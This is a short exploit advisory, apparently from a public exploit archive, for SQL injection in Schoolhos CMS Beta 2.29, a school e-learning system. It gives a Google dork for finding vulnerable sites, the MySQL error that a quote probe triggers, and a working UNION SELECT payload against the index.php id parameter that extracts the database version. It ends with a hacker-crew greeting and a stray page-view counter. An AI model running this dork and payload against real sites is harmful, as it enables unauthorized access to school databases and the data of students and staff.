# Exploit Title: Schoolhos CMS SQL Injetions # Google Dork: intext:Schoolhos Free Open Source CMS # Date: 22 Oktober 2012 # Exploit Author: Cumi++ # Vendor Homepage: http://schoolhos.com/ # Version: Beta 2.29 # Tested on: Ubuntu 12.04 # ======================================================= Descripcion : Schoolhos is an education and e-learning CMS, have used by more school.. http://127.0.0.1/schoolhost/index.php?p=info&id='3 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/me/public_html/coretan\tema\hijau\konten.php on line 219 Exploit: SQL : SQL injection http://127.0.0.1/schoolhost/index.php?p=info&id='3'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--Cumi++ ======================================================== Its first time.. Salam Rusuh... Indonesian Coder, Indonesian Hacker, Pekanbaru Cyber.. Tembilahan Coder Crew. When A Code Can Change The WorldБрой прочитания на тази страница: 1283
Schoolhos CMS Beta 2.29 (index.php, id parameter) SQL Injection